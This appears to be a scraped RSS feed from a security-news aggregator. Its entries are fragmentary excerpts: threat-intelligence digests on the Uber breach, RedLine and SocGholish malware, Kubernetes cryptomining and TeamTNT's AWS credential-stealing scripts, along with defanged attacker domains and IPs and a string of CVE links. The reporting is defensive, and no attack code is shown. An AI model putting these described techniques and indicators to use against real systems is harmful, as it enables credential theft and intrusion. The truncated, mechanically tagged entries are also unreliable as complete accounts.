This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-06-03T12:47:24+00:00 www.secnews.physaphae.fr ProofPoint - Cyber Firms 2024-01-09T11:57:12+00:00 https://www.proofpoint.com/us/blog/identity-threat-defense/rise-in-identity-threats www.secnews.physaphae.fr/article.php?IdArticle=8437188 False Ransomware,Malware,Tool,Threat,Studies Uber 2.0000000000000000 ProofPoint - Cyber Firms 2023-11-27T09:26:51+00:00 https://www.proofpoint.com/us/blog/security-awareness-training/cybersecurity-topics-to-include-in-your-program www.secnews.physaphae.fr/article.php?IdArticle=8417272 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Cloud Uber,Uber 2.0000000000000000 ProofPoint - Cyber Firms 2023-11-21T08:35:02+00:00 https://www.proofpoint.com/us/blog/information-protection/preventing-mfa-fatigue-attacks www.secnews.physaphae.fr/article.php?IdArticle=8415409 False Ransomware,Data Breach,Malware,Tool,Threat,Technical Uber 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC CI/CD pipeline, microservice architecture, and frictionless integration with orchestration tools. Orchestration tools form the backbone of container ecosystems, providing vital functionalities such as load balancing, fault tolerance, centralized management, and seamless system scaling. Orchestration can be realized through diverse approaches, including cloud provider services, self-deployed Kubernetes clusters, container management systems tailored for developers, and container management systems prioritizing user-friendliness. The container threat landscape According to recent findings of Sysdig, a company specializing in cloud security, a whopping 87% of container images have high-impact or critical vulnerabilities. While 85% of these flaws have a fix available, they can’t be exploited because the hosting containers aren’t in use. That said, many organizations run into difficulties prioritizing the patches. Rather than harden the protections of the 15% of entities exposed at runtime, security teams waste their time and resources on loopholes that pose no risk. One way or another, addressing these vulnerabilities requires the fortification of the underlying infrastructure. Apart from configuring orchestration systems properly, it’s crucial to establish a well-thought-out set of access permissions for Docker nodes or Kubernetes. Additionally, the security of containers hinges on the integrity of the images used for their construction. Guarding containers throughout the product life cycle A container\'s journey encompasses three principal stages. The initial phase involves constructing the container and subjecting it to comprehensive functional and load tests. Subsequently, the container is stored in the image registry, awaiting its moment of execution. The third stage, container runtime, occurs when the container is launched and operates as intended. Early identification of vulnerabilities is vital, and this is where the shift-left security principle plays a role. It encourages an intensified focus on security from the nascent stages of the product life cycle, encompassing the design and requirements gathering phases. By incorporating automated security checks within the CI/CD pipeline, developers can detect security issues early and minimize the chance of security gap]]> 2023-10-26T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/ensuring-robust-security-of-a-containerized-environment www.secnews.physaphae.fr/article.php?IdArticle=8400754 False Tool,Vulnerability,Threat,Cloud Uber 3.0000000000000000 CVE Liste - Common Vulnerability Exposure Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting from version 2.6.0 have a bug where open web terminal sessions do not expire. This bug allows users to send any websocket messages even if the token has already expired. The most straightforward scenario is when a user opens the terminal view and leaves it open for an extended period. This allows the user to view sensitive information even when they should have been logged out already. A patch for this vulnerability has been released in the following Argo CD versions: 2.6.14, 2.7.12 and 2.8.1.]]> 2023-08-23T20:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-40025 www.secnews.physaphae.fr/article.php?IdArticle=8373842 False Tool,Vulnerability Uber None AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC The State of API Security Q1 Report 2023 survey finding concluded that the attacks targeting APIs had increased 400% during the past six months. Security vulnerabilities within APIs compromise critical systems, resulting in unauthorized access and data breaches like Twitter and Optus API breaches. Cybercriminals can exploit the vulnerabilities and launch various attacks like authentication attacks, distributed denial-of-service attacks (DDoS), and malware attacks. API security has emerged as a significant business issue as another report reveals that by 2023, API abuses will be the most frequent attack vector causing data breaches, and also, 50% of data theft incidents will happen due to insecure APIs. As a result, API security has. become a top priority for organizations to safeguard their data, which may cost businesses $75 billion annually. Why does API security still pose a threat in 2023? Securing APIs has always been a daunting task for most organizations, mainly because of the misconfigurations within APIs and the rise in cloud data breaches. As the security landscape evolved, API sprawl became the top reason that posed a threat to API security. API sprawl is the uncontrolled proliferation of APIs across an organization and is a common problem for enterprises with multiple applications, services, and development teams. As more APIs are created, they expanded the attack surface and emerged as an attractive target for hackers. The issue is that the APIs are not always designed by keeping security standards in mind. This leads to a lack of authorization and authentication, exposing sensitive data like personally identifiable information (PII) or other business data.  API sprawl]]> 2023-08-15T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/why-is-api-security-the-next-big-thing-in-cybersecurity www.secnews.physaphae.fr/article.php?IdArticle=8370101 False Malware,Tool,Vulnerability,Threat,Cloud Uber 3.0000000000000000 knowbe4 - cybersecurity services CyberheistNews Vol 13 #22  |   May 31st, 2023 [Eye on Fraud] A Closer Look at the Massive 72% Spike in Financial Phishing Attacks With attackers knowing financial fraud-based phishing attacks are best suited for the one industry where the money is, this massive spike in attacks should both surprise you and not surprise you at all. When you want tires, where do you go? Right – to the tire store. Shoes? Yup – shoe store. The most money you can scam from a single attack? That\'s right – the financial services industry, at least according to cybersecurity vendor Armorblox\'s 2023 Email Security Threat Report. According to the report, the financial services industry as a target has increased by 72% over 2022 and was the single largest target of financial fraud attacks, representing 49% of all such attacks. When breaking down the specific types of financial fraud, it doesn\'t get any better for the financial industry: 51% of invoice fraud attacks targeted the financial services industry 42% were payroll fraud attacks 63% were payment fraud To make matters worse, nearly one-quarter (22%) of financial fraud attacks successfully bypassed native email security controls, according to Armorblox. That means one in five email-based attacks made it all the way to the Inbox. The next layer in your defense should be a user that\'s properly educated using security awareness training to easily identify financial fraud and other phishing-based threats, stopping them before they do actual damage. Blog post with links:https://blog.knowbe4.com/financial-fraud-phishing [Live Demo] Ridiculously Easy Security Awareness Training and Phishing Old-school awareness training does not hack it anymore. Your email filters have an average 7-10% failure rate; you need a strong human firewall as your last line of defense. Join us Wednesday, June 7, @ 2:00 PM (ET), for a live demonstration of how KnowBe4 introduces a new-school approach to security awareness training and simulated phishing. Get a look at THREE NEW FEATURES and see how easy it is to train and phish your users. ]]> 2023-05-31T13:00:00+00:00 https://blog.knowbe4.com/cyberheistnews-vol-13-22-eye-on-fraud-a-closer-look-at-the-massive-72-percent-spike-in-financial-phishing-attacks www.secnews.physaphae.fr/article.php?IdArticle=8340859 False Ransomware,Malware,Hack,Tool,Threat,Conference ChatGPT,ChatGPT,Uber,Guam 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC github page to provide user support or employee monitoring. It has been historically associated with malicious activity performed by threat actors, APT groups (like in this Mandiant report from 2017), or government attacks (in this report by Unit42 in 2017). It was first released in July 2014 as “xRAT” and renamed to “Quasar” in August 2015. Since then, there have been released updates to the code until v1.4.1 in March 2023, which is the most current version. As an open-source RAT tool with updates 9 years after its creation, it is no surprise that it continues to be a common tool used by itself or combined with other payloads by threat actors up to this day. In a review of the most recent samples, a new Quasar variant was observed by Alien Labs in the wild: SeroXen. This new RAT is a modified branch of the open-source version, adding some modifications features to the original RAT. They’re selling it for monthly or lifetime fee. Figure 1 contains some of the features advertised on their website. Figure 1. SeroXen features announced on its website. This new RAT first showed up on a Twitter account, established in September 2022. The person advertising the RAT appeared to be an English-speaking teenager. The same Twitter handle published a review of the RAT on YouTube. The video approached the review from an attacking/Red Team point of view, encouraging people to buy the tool because it is worth the money. They were claiming to be a reseller of the tool. In December 2022, a specific domain was registered to market/sell the tool, seroxen[.]com. The RAT was distributed via a monthly license for $30 USD or a lifetime license of $60 USD. It was around that time that the malware was first observed in the wild, appearing with 0 detections on VirusTotal. After a few months, on the 1st of February, the YouTuber CyberSec Zaado published a video alerting the community about the capabilities of the RAT from a defensive perspective. In late February, the RAT was advertised on social media platforms such as TikTok, Twitter, YouTube, and several cracking forums, including hackforums. There were some conversations on gaming forums complaining about being infected by malware after downloading some video games. The artifacts described by the users matched with SeroXen RAT. The threat actor updated the domain name to seroxen[.]net by the end of March. This domain name was registered on March 27th]]> 2023-05-30T22:00:00+00:00 https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale www.secnews.physaphae.fr/article.php?IdArticle=8340743 False Malware,Tool,Threat APT 10,Uber 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters (published: April 21, 2023) A new Monero cryptocurrency-mining campaign is the first recorded case of gaining persistence via Kubernetes (K8s) Role-Based Access Control (RBAC), according to Aquasec researchers. The recorded honeypot attack started with exploiting a misconfigured API server. The attackers preceded by gathering information about the cluster, checking if their cluster was already deployed, and deleting some existing deployments. They used RBAC to gain persistence by creating a new ClusterRole and a new ClusterRole binding. The attackers then created a DaemonSet to use a single API request to target all nodes for deployment. The deployed malicious image from the public registry Docker Hub was named to impersonate a legitimate account and a popular legitimate image. It has been pulled 14,399 times and 60 exposed K8s clusters have been found with signs of exploitation by this campaign. Analyst Comment: Your company should have protocols in place to ensure that all cluster management and cloud storage systems are properly configured and patched. K8s buckets are too often misconfigured and threat actors realize there is potential for malicious activity. A defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) approach is a good mitigation step to help prevent actors from highly-active threat groups. MITRE ATT&CK: [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] T1496 - Resource Hijacking | [MITRE ATT&CK] T1036 - Masquerading | [MITRE ATT&CK] T1489 - Service Stop Tags: Monero, malware-type:Cryptominer, detection:PUA.Linux.XMRMiner, file-type:ELF, abused:Docker Hub, technique:RBAC Buster, technique:Create ClusterRoleBinding, technique:Deploy DaemonSet, target-system:Linux, target:K8s, target:​​Kubernetes RBAC 3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise; Suspected North Korean Actor Responsible (published: April 20, 2023) Investigation of the previously-reported 3CX supply chain compromise (March 2023) allowed Mandiant researchers to detect it was a result of prior software supply chain attack using a trojanized installer for X_TRADER, a software package provided by Trading Technologies. The attack involved the publicly-available tool SigFlip decrypting RC4 stream-cipher and starting publicly-available DaveShell shellcode for reflective loading. It led to installation of the custom, modular VeiledSignal backdoor. VeiledSignal additional modules inject the C2 module in a browser process instance, create a Windows named pipe and]]> 2023-04-25T18:22:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-two-supply-chain-attacks-chained-together-decoy-dog-stealthy-dns-communication-evilextractor-exfiltrates-to-ftp-server www.secnews.physaphae.fr/article.php?IdArticle=8331005 False Ransomware,Spam,Malware,Tool,Threat,Cloud APT 38,ChatGPT,APT 43,Uber 2.0000000000000000 CVE Liste - Common Vulnerability Exposure 2023-02-16T18:15:11+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-23947 www.secnews.physaphae.fr/article.php?IdArticle=8310941 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2023-02-08T21:15:10+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-25163 www.secnews.physaphae.fr/article.php?IdArticle=8308422 False Spam,Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2023-02-08T20:15:24+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-25165 www.secnews.physaphae.fr/article.php?IdArticle=8308394 False Tool Uber None CVE Liste - Common Vulnerability Exposure 2023-01-26T21:18:13+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-22736 www.secnews.physaphae.fr/article.php?IdArticle=8304612 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2023-01-26T21:18:12+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-22482 www.secnews.physaphae.fr/article.php?IdArticle=8304606 False Tool,Vulnerability Uber None Dark Reading - Informationweek Branch 2023-01-10T17:00:00+00:00 https://www.darkreading.com/cloud/microsoft-kinsing-malware-kubernetes-containers-postgresql www.secnews.physaphae.fr/article.php?IdArticle=8299606 False Tool Uber 2.0000000000000000 Dark Reading - Informationweek Branch 2022-12-21T15:51:30+00:00 https://www.darkreading.com/dr-tech/how-to-run-kubernetes-more-securely www.secnews.physaphae.fr/article.php?IdArticle=8296203 False Tool,Threat Uber 2.0000000000000000 CVE Liste - Common Vulnerability Exposure 2022-12-15T19:15:17+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23526 www.secnews.physaphae.fr/article.php?IdArticle=8291702 False Tool Uber None CVE Liste - Common Vulnerability Exposure 2022-12-15T19:15:17+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23525 www.secnews.physaphae.fr/article.php?IdArticle=8291701 False Tool Uber None CVE Liste - Common Vulnerability Exposure 2022-12-15T19:15:16+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23524 www.secnews.physaphae.fr/article.php?IdArticle=8291700 False Tool Uber None GoogleSec - Firm Security Blog rise in software supply chain attacks, a Log4j vulnerability of catastrophic severity and breadth, and even an Executive Order on Cybersecurity. It is against this background that Google is seeking contributors to a new open source project called GUAC (pronounced like the dip). GUAC, or Graph for Understanding Artifact Composition, is in the early stages yet is poised to change how the industry understands software supply chains. GUAC addresses a need created by the burgeoning efforts across the ecosystem to generate software build, security, and dependency metadata. True to Google's mission to organize and make the world's information universally accessible and useful, GUAC is meant to democratize the availability of this security information by making it freely accessible and useful for every organization, not just those with enterprise-scale security and IT funding. Thanks to community collaboration in groups such as OpenSSF, SLSA, SPDX, CycloneDX, and others, organizations increasingly have ready access to: Software Bills of Materials (SBOMs) (with SPDX-SBOM-Generator, Syft, kubernetes bom tool) signed attestations about how software was built (e.g. SLSA with SLSA3 Github Actions Builder, Google Cloud Build) vulnerability databases that aggregate information across ecosystems and make vulnerabilities more discoverable and actionable (e.g. OSV.dev, Global Security Database (GSD)). These data are useful on their own, but it's difficult to combine and synthesize the information for a more comprehensive view. The documents are scattered across different databases and producers, are attached to different ecosystem entities, and cannot be easily aggregated to answer higher-level questions about an organization's software assets. To help address this issue we've teamed up with Kusari, Purdue University, and Citi to create GUAC, a free tool to bring together many different sources of software security metadata. We're excited to share the project's proof of concept, which lets you query a small dataset of software metadata including SLSA provenance, SBOMs, and OpenSSF Scorecards. What is GUAC Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database-normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance. Conceptually, GUAC occupies the “aggregation and synthesis” layer of the software supply chain transparency logical model: ]]> 2022-10-20T13:01:02+00:00 http://security.googleblog.com/2022/10/announcing-guac-great-pairing-with-slsa.html www.secnews.physaphae.fr/article.php?IdArticle=7739960 False Tool,Vulnerability Uber None TechRepublic - Security News US In last week's security breach against Uber, the attackers downloaded internal messages from Slack as well as information from a tool used to manage invoices. ]]> 2022-09-20T20:17:02+00:00 https://www.techrepublic.com/article/uber-exposes-lapsus-breach/ www.secnews.physaphae.fr/article.php?IdArticle=7022467 False Tool Uber None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hacker Pwns Uber Via Compromised VPN Account (published: September 16, 2022) On September 15, 2022, ride-sharing giant Uber started an incident response after discovering a data breach. According to Group-IB researchers, download file name artifacts point to the attacker getting access to fresh keylogger logs affecting two Uber employees from Indonesia and Brazil that have been infected with Racoon and Vidar stealers. The attacker allegedly used a compromised VPN account credentials and performed multifactor authentication fatigue attack by requesting the MFA push notification many times and then making a social-engineering call to the affected employee. Once inside, the attacker allegedly found valid credentials for privilege escalation: a PowerShell script containing hardcoded credentials for a Thycotic privileged access management admin account. On September 18, 2022, Rockstar Games’ Grand Theft Auto 6 suffered a confirmed data leak, likely caused by the same attacker. Analyst Comment: Network defenders can consider setting up alerts for signs of an MFA fatigue attack such as a large number of MFA requests in a relatively short period of time. Review your source code for embedded credentials, especially those with administrative privileges. MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Credentials from Password Stores - T1555 Tags: MFA fatigue, Social engineering, Data breach, Uber, GTA 6, GTA VI, detection:Racoon, detection:Vidar, malware-type:Keylogger, malware-type:Stealer Self-Spreading Stealer Attacks Gamers via YouTube (published: September 15, 2022) Kaspersky researchers discovered a new campaign spreading the RedLine commodity stealer. This campaign utilizes a malicious bundle: a single self-extracting archive. The bundle delivers RedLine and additional malware, which enables spreading the malicious archive by publishing promotional videos on victim’s Youtube channel. These videos target gamers with promises of “cheats” and “cracks.” Analyst Comment: Kids and other online gamers should be reminded to avoid illegal software. It might be better to use different machines for your gaming and banking activities. MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Resource Hijacking - T1496 Tags: detection:RedLine, malware-type:Stealer, Bundle, Self-spreading, Telegraph, Youtub]]> 2022-09-20T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-uber-and-gta-6-were-breached-redline-bundle-file-advertises-itself-on-youtube-supply-chain-attack-via-ecommerce-fishpig-extensions-and-more www.secnews.physaphae.fr/article.php?IdArticle=7016803 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline Uber,Uber,APT 15,APT 41 None CVE Liste - Common Vulnerability Exposure 2022-09-07T21:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36049 www.secnews.physaphae.fr/article.php?IdArticle=6774470 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-09-01T13:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36055 www.secnews.physaphae.fr/article.php?IdArticle=6666260 False Tool Uber None CVE Liste - Common Vulnerability Exposure 2022-08-31T15:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36035 www.secnews.physaphae.fr/article.php?IdArticle=6648917 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-07-12T22:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31105 www.secnews.physaphae.fr/article.php?IdArticle=5679746 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-07-12T22:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31102 www.secnews.physaphae.fr/article.php?IdArticle=5679745 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure =v2.3.0 and do not have any Helm-type Applications you may disable the Helm config management tool as a workaround.]]> 2022-06-27T20:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31036 www.secnews.physaphae.fr/article.php?IdArticle=5423402 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-06-27T19:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31034 www.secnews.physaphae.fr/article.php?IdArticle=5422523 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-06-27T19:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31035 www.secnews.physaphae.fr/article.php?IdArticle=5422524 False Tool,Vulnerability Uber None GoogleSec - Firm Security Blog SBOMs)-a list of all the components, libraries, and modules that are required to build a piece of software. In the wake of the 2021 Executive Order on Cybersecurity, these ingredient labels for software became popular as a way to understand what's in the software we all consume. The guiding idea is that it's impossible to judge the risks of particular software without knowing all of its components-including those produced by others. This increased interest in SBOMs saw another boost after the National Institute of Standards and Technology (NIST) released its Secure Software Development Framework, which requires SBOM information to be available for software. But now that the industry is making progress on methods to generate and share SBOMs, what do we do with them?Generating an SBOM is only one half of the story. Once an SBOM is available for a given piece of software, it needs to be mapped onto a list of known vulnerabilities to know which components could pose a threat. By connecting these two sources of information, consumers will know not just what's in what's in their software, but also its risks and whether they need to remediate any issues.In this blog post, we demonstrate the process of taking an SBOM from a large and critical project-Kubernetes-and using an open source tool to identify the vulnerabilities it contains. Our example's success shows that we don't need to wait for SBOM generation to reach full maturity before we begin mapping SBOMs to common vulnerability databases. With just a few updates from SBOM creators to address current limitations in connecting the two sources of data, this process is poised to become easily within reach of the average software consumer. OSV: Connecting SBOMs to vulnerabilitiesThe following example uses Kubernetes, a major project that makes its SBOM available using the Software Package Data Exchange (SPDX) format-an international open standard (ISO) for communicating SBOM information. The same idea should apply to any project that makes its SBOM available, and for projects that don't, you can generate your own SBOM using the same bom tool Kubernetes created.We have chosen to map the SBOM to the Open Source Vulnerabilities (OSV) database, which describes vulnerabilities in a format that was specifically designed to map to open source package versions or commit hashes. The OSV database excels here as it provides a standardized format and aggregates information across multiple ecosystems (e.g., Python, Golang, Rust) and databases (e.g., Github Advisory Database (GHSA), Global Security Database (GSD)).To connect the SBOM to the database, we'll use the SPDX spdx-to-osv tool. This open source tool takes in an SPDX SBOM document, queries the OSV database of vulnerabilities, and returns an enumeration of vulnerabilities present in the software's declared components.Example: Kubernetes' SBOMThe first step is to download Kubernetes' SBOM, which is publicly available and contains information on the project, dependencies, versions, and ]]> 2022-06-14T12:00:00+00:00 http://security.googleblog.com/2022/06/sbom-in-action-finding-vulnerabilities.html www.secnews.physaphae.fr/article.php?IdArticle=5145917 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-05-20T15:15:10+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29165 www.secnews.physaphae.fr/article.php?IdArticle=4717170 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-05-20T14:15:09+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24904 www.secnews.physaphae.fr/article.php?IdArticle=4717093 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-05-20T14:15:09+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24905 www.secnews.physaphae.fr/article.php?IdArticle=4717094 False Tool,Vulnerability Uber None GoogleSec - Firm Security Blog GKE Sandbox to strengthen the container security boundary. Over the last few months, GKE Sandbox has protected containers running it against several newly discovered Linux kernel breakout CVEs.Adopt GKE Autopilot for new clusters. Autopilot clusters have default policies that prevent host access through mechanisms like host path volumes and host network. The container runtime default seccomp profile is also enabled by default on Autopilot which has prevented several breakouts.Subscribe to GKE Release Channels and use autoupgrade to keep nodes patched automatically against kernel vulnerabilities.Run Google's Container Optimized OS, the minimal and hardened container optimized OS that makes much of the disk read-only.Incorporate binary authorization into your SDLC to require that containers admitted into the cluster are from trusted build systems and up-to-date on patching.Use Secure Command Center's Container Threat Detection or supported third-party tools to detect the most common runtime attacks.More information can be found in the GKE Hardening Guide.How GKE is reducing the use of privileged pod]]> 2022-05-18T09:03:33+00:00 http://security.googleblog.com/2022/05/privileged-pod-escalations-in.html www.secnews.physaphae.fr/article.php?IdArticle=4687661 False Tool,Threat Uber None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SocGholish and Zloader – From Fake Updates and Installers to Owning Your Systems (published: April 25, 2022) Cybereason researchers have compared trending attacks involving SocGholish and Zloader malware. Both infection chains begin with social engineering and malicious downloads masquerading as legitimate software, and both lead to data theft and possible ransomware installation. SocGholish attacks rely on drive-by downloads followed by user execution of purported browser installer or browser update. The SocGholish JavaScript payload is obfuscated using random variable names and string manipulation. The attacker domain names are written in reverse order with the individual string characters being put at the odd index positions. Zloader infection starts by masquerading as a popular application such as TeamViewer. Zloader acts as information stealer, backdoor, and downloader. Active since 2016, Zloader actively evolves and has acquired detection evasion capabilities, such as excluding its processes from Windows Defender and using living-off-the-land (LotL) executables. Analyst Comment: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Steal or Forge Kerberos Tickets - T1558 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Unsecured Credentials - T1552 | [MITRE ATT&CK] Remote System Discovery - T1018 | [MITRE ATT&CK] System Owner/User Discovery - T1033 | ]]> 2022-04-26T16:24:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-gamaredon-delivers-four-pterodos-at-once-known-plaintext-attack-on-yanlouwang-encryption-north-korea-targets-blockchain-industry-and-more www.secnews.physaphae.fr/article.php?IdArticle=4508976 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Medical APT 38,Uber,APT 28 None CVE Liste - Common Vulnerability Exposure 2022-03-23T22:15:13+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24768 www.secnews.physaphae.fr/article.php?IdArticle=4332510 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-03-23T21:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24730 www.secnews.physaphae.fr/article.php?IdArticle=4331949 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure 2022-03-23T21:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24731 www.secnews.physaphae.fr/article.php?IdArticle=4331950 False Tool,Vulnerability Uber None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence What’s With The Shared VBA Code Between Transparent Tribe And Other Threat Actors? (published: February 9, 2022) A recent discovery has been made that links malicious VBA macro code between multiple groups, namely: Transparent Tribe, Donot Team, SideCopy, Operation Hangover, and SideWinder. These groups operate (or operated) out of South Asia and use a variety of techniques with phishing emails and maldocs to target government and military entities within India and Pakistan. The code is similar enough that it suggests cooperation between APT groups, despite having completely different goals/targets. Analyst Comment: This research shows that APT groups are sharing TTPs to assist each other, regardless of motive or target. Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel. MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Phishing - T1566 Tags: Transparent Tribe, Donot, SideWinder, Asia, Military, Government Fake Windows 11 Upgrade Installers Infect You With RedLine Malware (published: February 9, 2022) Due to the recent announcement of Windows 11 upgrade availability, an unknown threat actor has registered a domain to trick users into downloading an installer that contains RedLine malware. The site, "windows-upgraded[.]com", is a direct copy of a legitimate Microsoft upgrade portal. Clicking the 'Upgrade Now' button downloads a 734MB ZIP file which contains an excess of dead code; more than likely this is to increase the filesize for bypassing any antivirus scan. RedLine is a well-known infostealer, capable of taking screenshots, using C2 communications, keylogging and more. Analyst Comment: Any official Windows update or installation files will be downloaded through the operating system directly. If offline updates are necessary, only go through Microsoft sites and subdomains. Never update Windows from a third-party site due to this type of attack. MITRE ATT&CK: [MITRE ATT&CK] Video Capture - T1125 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: RedLine, Windows 11, Infostealer ]]> 2022-02-15T20:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-mobile-malware-is-on-the-rise-apt-groups-are-working-together-ransomware-for-the-individual-and-more www.secnews.physaphae.fr/article.php?IdArticle=4134740 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline APT 43,Uber,APT 36,APT-C-17 None Security Affairs - Blog Secu 2022-02-06T13:49:13+00:00 https://securityaffairs.co/wordpress/127708/hacking/kubernetes-argo-cd-flaw.html?utm_source=rss&utm_medium=rss&utm_campaign=kubernetes-argo-cd-flaw www.secnews.physaphae.fr/article.php?IdArticle=4088680 False Tool Uber None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-02-05T21:48:25+00:00 https://thehackernews.com/2022/02/new-argo-cd-bug-could-let-hackers-steal.html www.secnews.physaphae.fr/article.php?IdArticle=4088212 False Tool,Vulnerability Uber None Anomali - Firm Blog Figure 1 - Overview of /cmd/ Contained on the server are approximately 50 scripts, most of which are already documented, located in the /cmd/ directory. The objective of the scripts vary and include the following: AWS Credential Stealer Diamorphine Rootkit IP Scanners Mountsploit Scripts to set up utils Scripts to setup miners Scripts to remove previous miners Figure 2 - Snippet of AWS Credential Stealer Script Some notable scripts, for example, is the script that steals AWS EC2 credentials, shown above in Figure 2. The AWS access key, secret key, and token are piped into a text file that is uploaded to the Command and Control (C2) server. Figure 3 - Chimaera_Kubernetes_root_PayLoad_2.sh Another interesting script is shown in Figure 3 above, which checks the architecture of the system, and retrieves the XMRig miner version for that architecture from another open TeamTNT server, 85.214.149[.]236. Binaries (/bin/) Figure 4 - Overview of /bin Within the /bin/ folder, shown in Figure 4 above, there is a collection of malicious binaries and utilities that TeamTNT use in their operations. Among the files are well-known samples that are attributed to TeamTNT, including the Tsunami backdoor and a XMRig cryptominer. Some of the tools have the source code located on the server, such as TeamTNT Bot. The folder /a.t.b contains the source code for the TeamTNT bot, shown in Figures 5 and 6 below. In addition, the same binaries have been found on a TeamTNT Docker, noted in Appendix A. 